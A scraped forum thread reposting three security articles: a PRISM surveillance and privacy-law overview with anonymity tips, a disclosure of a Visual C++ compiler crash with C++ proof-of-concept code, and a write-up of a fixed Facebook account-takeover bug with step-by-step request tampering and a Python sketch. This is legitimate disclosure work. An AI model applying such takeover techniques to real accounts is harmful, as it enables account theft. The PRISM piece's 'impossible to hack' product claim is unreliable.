"We do not provide any government organization with direct access to Facebook servers."
"When Facebook is asked for data or information about specific individuals, we carefully scrutinize any such request for compliance with all applicable laws, and provide information only to the extent required by law," declared Joe Sullivan, Chief Security Officer for Facebook.
"We have never heard of PRISM."
"We do not provide any government agency with direct access to our servers, and any government agency requesting customer data must get a court order," said Steve Dowling, a spokesman for Apple.

[h=1]Is the PRISM Program Legal? Law and Regulations[/h]

The digital exposure of Internet users has reached a level unthinkable until a few years ago. This has had mainly positive effects, but it has also increased the attack surface for each individual. We are all exposed to serious privacy risks, especially as legislation has struggled to keep up. The number of laws that try to regulate our digital existence is increasing. There is a need to close the gaps in legislation and enforcement that open users up to online data breaches, stalking, identity theft and disclosure of personal information. It must be considered that these laws can have a major impact on our lives; they can touch every ordinary activity, starting with something as simple as a phone call. Analyzing the US legal model, we can recognize the different areas in which such laws are trying to regulate the introduction of technology. A short list follows:

[h=3]Digital Life[/h]

Laws and proposals designed to protect users' privacy in the online and mobile spheres:

- The Protecting Children from Internet Pornographers Act of 2011 was designed to increase the enforcement of laws related to child pornography and child sexual exploitation.
- The Electronic Communications Privacy Act is almost 30 years old, so it is likely going to see some major revisions to reflect the increased variety and prevalence of electronic communications. The original act was designed to help expand federal wiretapping and electronic eavesdropping provisions, as well as to protect communications that occur via wire, oral, and electronic means and to balance the right to privacy of citizens with the needs of law enforcement.
- The Children's Online Privacy Protection Act (COPPA) protects children under 13 from the online collection of personal information.
- The GPS Act is a proposal to give government agencies, commercial entities, and private citizens specific guidelines for the use of geolocation information.

[h=3]Digital Commerce[/h]

The massive introduction of technology into commerce has required the definition of strict laws to avoid the abuse of information on consumer habits and activities. The following laws seek to address a number of major issues related to consumer privacy rights:

- The Commercial Privacy Bill of Rights establishes a baseline code of conduct for how personal information can be used, stored, and distributed.
- The Application Privacy, Protection, and Security Act of 2013 was designed to address concerns with the data collection being done through applications on mobile devices and would require that app developers provide greater transparency about their data collection practices.
- The Location Privacy Protection Act of 2011 addresses the risks of stalking posed by cell phones loaded with GPS and apps that gather information about a user's location.
- The Cyber Intelligence Sharing and Protection Act (CISPA) is designed to allow government investigation of cyber threats and the sharing of Internet traffic information between the US government and IT and manufacturing companies.

[h=3]Work and Employment[/h]

Laws and regulations that affect users in the workplace during their ordinary activities:

- The Social Media Privacy Act provides for the protection of online privacy for job seekers.
- The Genetic Information Nondiscrimination Act of 2008 prohibits the use of genetic information in health insurance and employment.

[h=3]Personal Information[/h]

No doubt, the most important set of laws and regulations are those that address issues of personal information, including medical data, private phone conversations, and video watching history.
- The Foreign Intelligence Surveillance Act (FISA) Amendments Act of 2008 / FISA Amendments Act Reauthorization Act of 2012: FISA passed in 1978 but has undergone some major restructuring in recent years. It prescribed basic procedures for physical and electronic surveillance and the collection of foreign intelligence information, and it provides strict judicial and congressional oversight of any covert surveillance activities. It has been modified several times; the first modification, under the Patriot Act, expired in 2008. The U.S. Senate voted in December 2012 to extend the FISA Amendments Act through the end of 2017. Under this act, the US Government is authorized to conduct surveillance of Americans' international communications, including phone calls, emails, and Internet records, exactly what is addressed by the PRISM program. These orders do not need to specify who is being spied on or the reasons for doing so. It is now possible for government agencies to collect information on any foreign communications, which many individuals and privacy protection groups have consistently argued is a gross violation of privacy and civil liberties.
- The Health Information Technology for Economic and Clinical Health (HITECH) Act requires that major security breaches be reported to Health and Human Services as well as the media. It increases enforcement of HIPAA and the resulting penalties and ensures that any individual can request a copy of his or her public health record. Most importantly, it expands HIPAA regulations to include any business associates or providers to medical facilities, requiring vendors of any kind to keep private records private.
- The Video Privacy Protection Act was designed to prevent the disclosure of audio/video materials; with respect to the original proposal, it has been extended to cover social media sites.
- The Protect Our Health Privacy Act of 2012 requires health providers to encrypt any mobile device containing health information, restricts business associates' use of protected health information, improves congressional oversight of HIPAA, and provides additional measures that protect patient privacy and safety when using health information technology.

[h=3]Back to the PRISM Case[/h]

After this analysis of the principal laws and proposals, users can have a clearer idea of what governments are allowed to do to ensure homeland security. The US PRISM program seems to be allowed by Section 215 of the Patriot Act, "which authorizes the existence of special procedures, authorized by the FISA court, to force U.S. companies to deliver assets and records of their customers, from the metadata to confidential communications, including e-mail, chat, voice and video, videos and photos." It expands law enforcement's power to spy on every US citizen, including permanent residents, without providing an explanation, even allowing investigations to be started based on the exercise of First Amendment rights. Those who are the subjects of the surveillance are never notified of ongoing activities. Law enforcement can keep track of every activity of a suspect, including communications and Internet activities. Many citizens and lawyers consider Section 215 unconstitutional, claiming that it violates the Fourth Amendment by allowing the government to carry out Fourth Amendment searches without a warrant and without showing probable cause. Section 215 might also be used to obtain information that affects privacy interests other than those protected by the First Amendment; consider, for example, medical records. The provision of such data also violates the Fourth and Fifth Amendments by failing to require that those who are the subject of Section 215 orders be told that their privacy has been compromised.
[h=1]The Outsourcing of Intelligence: Risks and Benefits[/h] The recent leak of the US Top Secret PRISM program by an intelligence contractor sparked a heated debate on the practice of outsourcing personnel for top-secret programs. Outsourcing was an inevitable consequence of the growth of the security sector and of the increased number of tasks governments must perform to ensure homeland security and the security of the principal productive sectors. Edward Snowden worked at Booz Allen Hamilton and other intelligence contractors; his career started at the Central Intelligence Agency with various technical assignments. In an official statement, Booz Allen declared: "Booz Allen can confirm that Edward Snowden, 29, was an employee of our firm for less than 3 months, assigned to a team in Hawaii. Snowden, who had a salary at the rate of $122,000, was terminated June 10, 2013 for violations of the firm's code of ethics and firm policy. News reports that this individual has claimed to have leaked classified information are shocking, and if accurate, this action represents a grave violation of the code of conduct and core values of our firm. We will work closely with our clients and authorities in their investigation of this matter." Snowden is one of the thousands of private intelligence contractors hired by the US Government in response to the increased need for security to prevent terrorist attacks. Many of these professionals play critical roles within the principal security agencies of the country. They access confidential information, gather sensitive data on intelligence missions, and work side by side with civilian government analysts, accessing a huge quantity of secret and top-secret documents. 
According to official figures released by the Office of the Director of National Intelligence, almost one in four intelligence workers is employed by a contractor, and around 70% of the intelligence community's secret budget is spent on outsourcing. The outsourcing of intelligence activities allows better rationalization of the funds designated to ensure homeland security, but it also creates a serious risk of infiltration by spies and whistleblowers. The AP reported that nearly 500,000 contractors have access to the government's top secret programs. "Of the 4.9 million people with clearance to access "confidential and secret" government information, 1.1 million, or 21 percent, work for outside contractors, according to a report from Clapper's office. Of the 1.4 million who have the higher "top secret" access, 483,000, or 34 percent, work for contractors." In 2007, the former director of Naval Intelligence, retired Rear Adm. Thomas A. Brooks, wrote in a report that contractors had assumed a crucial role within the nation's intelligence infrastructure. "The extensive use of contractor personnel to augment military intelligence operations is now an established fact of life …. It is apparent that contractors are a permanent part of the intelligence landscape," he said. To give an idea of the number of private contractors working for US intelligence agencies, The Post reported that 1,931 private companies worked on classified counterterrorism operations and many other campaigns to strengthen homeland security, conducted in around 10,000 locations all over the country. During the last year, the principal emergency has been the increased number of cyber attacks, both sabotage and cyber espionage campaigns, against national networks. 
The massive introduction of technology has made it necessary to recruit a large number of technicians entrusted with the delicate task of protecting the country's infrastructure, such as communication networks, power grids, and satellite systems. A recent trend that emerged in response to continuous cyber attacks is the involvement of skilled professionals and hackers in offensive operations, hired to train cyber units. These same hackers have been used to perform vulnerability assessments and penetration tests on critical infrastructure. [h=1]The Risk of Cyber Attacks on the US Massive Surveillance System[/h] One of the most alarming risks related to a Top Secret program such as PRISM is the possible disclosure of the information gathered. Unauthorized access to that information could give a foreign government a meaningful advantage in terms of intelligence: foreign hackers could reach a huge quantity of sensitive information centralized and concentrated in a single vulnerable architecture. It must also be considered that such an attack could be carried out by insiders and cyber spies. The case of Bradley Manning showed public opinion the devastating effect that the revelation of the government's secret documents can have on homeland security. Considering that nearly 854,000 people ordinarily hold top-secret security clearances, it is easy to understand the attack surface of the intelligence "machine". Each of these individuals could be a target for state-sponsored hackers, and could itself represent an insider threat. The disclosure of the PRISM program demonstrates that the principal US intelligence and law enforcement agencies weren't able to protect Top Secret information from disclosure. 
The information was acquired by a journalist thanks to a spontaneous revelation, but it must be considered that many other Top Secret programs could be affected by cyber espionage operations run by foreign governments. "The access to PRISM information could enable blackmail on a massive scale, widespread manipulation of U.S. politics, and industrial espionage against American businesses." If persistent collectors such as the Chinese government, or a hostile country like Iran or North Korea, gained access to the surveillance system, it would be a tragedy for the country. Suddenly the country would have no secrets from the adversary, and every sector would be deeply impacted. Foreign governments aren't the only ones interested in access to the surveillance system: terrorists belonging to groups like Al Qaeda, and also cyber criminals, could breach the defenses of intelligence archives. The development and deployment of a massive surveillance system is a critical choice. The government must be sure it can prevent foreign intrusions and avoid creating what could become a single point of failure for the overall security of the country. [h=1]Countermeasures[/h] There are various ways to limit the exposure of our digital lives to surveillance and monitoring activities. The US Government and law enforcement could access email accounts such as Gmail, spy on user communications, and discover users' habits. Following are a few simple suggestions to avoid monitoring: [h=3]How to anonymize the user's Internet experience?[/h]
Tor Network
On the Internet, every machine is identified by its IP address, which can be hidden by using anonymizing services and networks such as I2P and the Tor network. Usually, the anonymizing process is based on the concept of distributing routing information. The Tor software and the open Tor network help users avoid surveillance during web browsing, hiding the IP address and other identifying information if properly configured. 
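The layered "onion" encryption idea behind Tor can be illustrated with a toy sketch. To be clear, this is not Tor's actual protocol (Tor negotiates per-hop keys via Diffie–Hellman and uses real ciphers over TLS); here each relay's layer is a throwaway XOR keystream derived with SHA-256, and the relay names and keys are invented, purely to show how each node peels exactly one layer without seeing the plaintext until the exit.

```python
import hashlib

def keystream_xor(key, data):
    # Toy stream cipher: XOR with a SHA-256-derived keystream. NOT secure;
    # for illustration only.
    out = bytearray()
    counter = 0
    while len(out) < len(data):
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(b ^ k for b, k in zip(data, out))

def wrap(message, relay_keys):
    # The client adds one layer per relay, innermost layer for the exit node.
    for key in reversed(relay_keys):
        message = keystream_xor(key, message)
    return message

def route(onion, relay_keys):
    # Each relay peels exactly one layer and forwards the rest; only the
    # exit node recovers the original request.
    for key in relay_keys:
        onion = keystream_xor(key, onion)
    return onion

keys = [b"entry-node", b"middle-node", b"exit-node"]
onion = wrap(b"GET / HTTP/1.1", keys)
assert route(onion, keys) == b"GET / HTTP/1.1"
```

Because XOR layers commute, this toy does not enforce hop ordering the way real onion routing does; it only conveys the "one layer per relay" structure.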
Anonymity is granted by bouncing traffic among randomly routed proxy computers before sending it on to its real destination, and by encrypting the messages. Every node of the network handles only the minimal information needed to route packets to the next hop, without keeping a history of the path. Tor is easy to use: you can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing.
Web Proxy
To anonymize a user's identity and IP address, it is possible to use anonymizing services. The simplest way is through Web-based proxies like Proxify or Hide My Ass. Web proxies are easy to use: just by typing a website URL, the user can visit it anonymously. Many of them also implement advanced features to encrypt connections or block cookies and JavaScript. The principal drawbacks are reduced speed and difficulty accessing some content, such as videos. Of course, be aware of which proxy you use, as you could come across honeypots set up to spy on you.
VPN
Virtual Private Networks are a valid solution for surfing the Internet anonymously. Premium paid VPN services dedicate proxy servers to their customers. All client traffic is tunneled to the VPN server via an encrypted connection and from there to the web. The result is that websites see the server's IP instead of the client's. The principal concern is the tendency of some VPN providers to keep server logs that could reveal users' habits. Of course, the principal service providers deny it, but it is a concrete risk. All the above solutions slow down surfing speed, due to the tunneling processes and the cryptographic algorithms they apply. [h=3]Keep your chat conversations private[/h] For every communication channel, there is a more or less secure solution. 
Events have demonstrated that the most popular conventional instant messaging services, like those offered by Google, Yahoo, or Microsoft, keep track of your conversations. A typical way to protect the content of chat communications is to encrypt messages end to end, which can be done using a self-made chat client that enciphers the content to transmit, or by choosing a chat extension available on the Internet. A very popular cryptographic protocol that provides strong encryption for instant messaging conversations is OTR ("off the record"). It uses a combination of the AES symmetric-key algorithm, the Diffie–Hellman key exchange, and the SHA-1 hash function to protect user privacy. With the protocol in place, the server only sees the encrypted conversations, thwarting eavesdropping. Of course, to use OTR, both interlocutors must install instant messaging software that supports it, such as Pidgin for Windows and Linux systems. [h=3]Keep your calls private[/h] Telephone conversations are exposed to government monitoring, and PRISM is just the latest demonstration of the control exercised by the authorities for security reasons. Until a few years ago, users were convinced that Internet-based telephony applications were the most secure way to make calls and avoid wiretapping; Skype was considered the most secure channel until its acquisition by Microsoft. Of course, I'm speaking of commercial products, leaving aside the various crypto-phones and applications sold at high cost by many security firms. Today one of the most interesting solutions on the market is Silent Circle. It implements end-to-end encryption, making it impossible for telephone companies to access the user's calls. 
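The key agreement at the heart of OTR, and of end-to-end encrypted channels generally, is Diffie–Hellman: both parties derive the same shared secret without ever transmitting it. A minimal sketch follows; the prime here is toy-sized and insecure (real OTR uses a 1536-bit MODP group), and the final key-derivation step is a simplified stand-in for what the protocol actually does.

```python
import hashlib
import secrets

# Toy parameters: far too small to be secure, chosen only to show the math.
P = 2**127 - 1   # a Mersenne prime
G = 5

# Each party picks a private exponent and publishes G^x mod P.
alice_priv = secrets.randbelow(P - 2) + 2
bob_priv = secrets.randbelow(P - 2) + 2
alice_pub = pow(G, alice_priv, P)
bob_pub = pow(G, bob_priv, P)

# Both sides raise the other's public value to their own private exponent
# and arrive at the same secret: (G^b)^a = (G^a)^b mod P.
alice_secret = pow(bob_pub, alice_priv, P)
bob_secret = pow(alice_pub, bob_priv, P)
assert alice_secret == bob_secret

# Session keys for the symmetric cipher are then derived from the secret,
# e.g. by hashing it (simplified here; OTR's actual derivation differs).
session_key = hashlib.sha1(alice_secret.to_bytes(16, "big")).digest()
```

The eavesdropping server sees only `alice_pub` and `bob_pub`; recovering the secret from those is the discrete logarithm problem, which is what makes the exchange safe at real-world key sizes.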
As reported by the Washington Post: "The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn't contain any "back doors."" Another interesting piece of software with similar functionality, also independently audited to make sure there are no back doors, is RedPhone, an application that protects phone calls with end-to-end encryption. It has been developed with financial support from U.S. taxpayers, courtesy of the Open Technology Fund. [h=3]Protecting emails[/h] Another critical aspect is the protection of users' mail. Commercial PGP and free GPG are considered the standard for email security, and both can be used to encrypt and decrypt messages and so avoid surveillance. GNU Privacy Guard (GnuPG or GPG) is a GPL-licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, the current IETF standards-track specification of OpenPGP. Current versions of PGP (and Veridis' Filecrypt) are interoperable with GnuPG and other OpenPGP-compliant systems. The main problem with GPG is that novice users may find it complicated to use and not very portable. I can promise that in the next few weeks, a product designed by me and my staff that makes the use of GPG on multiple platforms very easy will become available. The solution I designed is very strong and impossible to hack, and it also hides many other surprising features. [h=1]Conclusions[/h] The existence of the PRISM program doesn't surprise security experts or ordinary people. According to a recent survey, the majority are willing to sacrifice their privacy for homeland security. In the PRISM story, I personally found concerning the approach of the principal IT companies, which had professed a totally different respect for privacy. My last thought is for surveillance operations elsewhere on the planet, where surveillance is often synonymous with censorship and persecution. 
The laws and regulations of many countries accept these practices to protect the interests of the oligarchy that governs the state. What will happen now that we know that the machines spying on us are also equipped with artificial intelligence and can take action against human beings? [h=1]References[/h]
Edward Snowden is responsible for the disclosure of the PRISM program
Edward Snowden: the whistleblower behind the NSA surveillance revelations | World news | The Guardian
NSA slides explain the PRISM data-collection program - The Washington Post
NSA Prism program taps in to user data of Apple, Google and others | World news | The Guardian
The outsourcing of U.S. intelligence raises risks among the benefits - The Washington Post
http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html
InfoSec Institute Resources – Introduction to Anonymizing Networks – Tor vs I2P
NSA Leak Highlights Key Role Of Private Contractors
The Legislation of Privacy: New Laws That Will Change Your Life - BackgroundCheck.org
Five ways to stop the NSA from spying on you
Sursa: InfoSec Institute Resources – PRISM – Facts, Doubts, Laws and Loopholes
-
[h=2]Crashing the Visual C++ compiler[/h]In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the liking of the Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this). [h=2]Heads up![/h]If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article: Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the [URL="http://technet.microsoft.com/library/cc184906.aspx"]TechNet Article Security Guidance[/URL]. 
In other words (keep in mind I'm not a build service expert, but this is how I understand it):
- Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server.
- It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server.
- You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers machines, etc.
To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges. [h=2]The code that crashes[/h]The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future):

#include <stdio.h>

class A { public: int alot[1024]; };
class B : public A { public: int more[1024]; };
class C : public A { public: int more[1024]; };
class DA : public B,C { public: int much[1024]; };
class DB : public B,C { public: int much[1024]; };

#define X(a) \
  class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \
  class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; }

#define Y(a) \
  X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \
  X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA)

Y(D);
Y(DAAAAAAAA);
Y(DAAAAAAAAAAAAAAAA);
X(DAAAAAAAAAAAAAAAAAAAAAAAA);

// Funny story. Without global it doesn't compile (LNK1248).
// But with global it seems to overflow, and it compiles OK.
int global[0x12348];

DAAAAAAAAAAAAAAAAAAAAAAAAAA x;

int main(void) {
  printf("%p\n", &x);
  printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing
                                         //      DAA...AA_more to different
                                         //      amount of 'A'

  // Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01):
  // test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler.
  // (compiler file 'msc1.cpp', line 1420)
  // To work around this problem, try simplifying or changing the program near the locations listed above.
  // Please choose the Technical Support command on the Visual C++
  // Help menu, or open the Technical Support help file for more information
  // Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later.
  //
  // (2154.dd4): Access violation - code c0000005 (first chance)
  // First chance exceptions are reported before any exception handling.
  // This exception may be expected and handled.
  // eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0
  // eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0   nv up ei pl nz na pe cy
  // cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b    efl=00010207
  // MSVCR100!_VEC_memcpy+0x5a:
  // 73170bb7 660f7f6740  movdqa xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=????????????????????????????????
  //
  return 0;
}

As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code). If you manage to prove that the bug is exploitable, let me know! [h=2]Vendor communication timeline[/h]
2012-09-30: Report sent to Microsoft (DoS only PoC).
2012-10-01: Received ACK + request for further clarification.
2012-10-03: Received information that the crash appears to be exploitable.
2012-10-03: Sent clarification. 
2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue.
2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug.
2012-11-06: Received ACK + information that the bug will be discussed again with the product team.
2012-12-18: Received "we are still working on it".
2013-01-31: Sent a ping.
2013-06-03: Sent a ping.
2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note.
2013-06-21: Sent a heads up with this blog post.
2013-06-24: Published this blog post.
[h=2]Update[/h]A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out): 57 Small Programs that Crash Compilers Sursa: gynvael.coldwind//vx.log
-
[h=2]Hijacking a Facebook Account with SMS[/h] This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy.
Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address.
The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, and profile_id, which is the account to link the number to. The thing is, profile_id is set to your account (obviously), but changing it to your target's doesn't trigger an error.
To exploit this bug, we first send the letter F to 32665, which is Facebook's SMS shortcode in the UK. We receive an 8 character verification code back. We enter this code into the activation box (located here), and modify the profile_id element inside the fbMobileConfirmationForm form. Submitting the request returns a 200. You can see the value of __user (which is sent with all AJAX requests) is different from the profile_id we modified. Note: You may have to reauth after submitting the request, but the password required is yours, not the target's. An SMS is then received with confirmation.
Now we can initiate a password reset request against the user and get the code via SMS. Another SMS is received with the reset code. We enter this code into the form, choose a new password, and we're done. The account is ours.
[h=4]Fix[/h] Facebook responded by no longer accepting the profile_id parameter from the user.
[h=4]Timeline[/h]
23rd May 2013 - Reported
28th May 2013 - Acknowledgment of Report
28th May 2013 - Issue Fixed
[h=4]Note[/h] The bounty assigned to this bug was $20,000, clearly demonstrating the severity of the issue. Sursa: http://blog.fin1te.net/post/53949849983/hijacking-a-facebook-account-with-sms
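For illustration, the parameter tampering at the core of this (long since fixed) bug can be sketched as follows. This is a reconstruction, not a working exploit: the endpoint name and the code, profile_id, and __user fields come from the write-up above, while the numeric account ids and the verification code are made up, and session cookies and CSRF handling are omitted entirely.

```python
from urllib.parse import urlencode

# Hypothetical account ids, purely for illustration.
ATTACKER_ID = "100000000000001"  # the attacker's own account (__user)
TARGET_ID = "100000000000002"    # the victim whose account gets linked

# Endpoint named in the write-up.
endpoint = "https://www.facebook.com/ajax/settings/mobile/confirm_phone.php"

form = {
    "code": "ABCD1234",       # the 8-character code received via SMS
    "profile_id": TARGET_ID,  # tampered: points at the victim's account
    "__user": ATTACKER_ID,    # still identifies the attacker's own session
}
body = urlencode(form)

# The whole bug: the server trusted profile_id even though it disagreed
# with the session's __user. The fix was to ignore the client-supplied
# profile_id and derive the account from the session instead.
assert form["profile_id"] != form["__user"]
```

The mismatch between `profile_id` and `__user` in the request body is exactly what the screenshots in the original post showed, and closing that gap server-side is what resolved the issue.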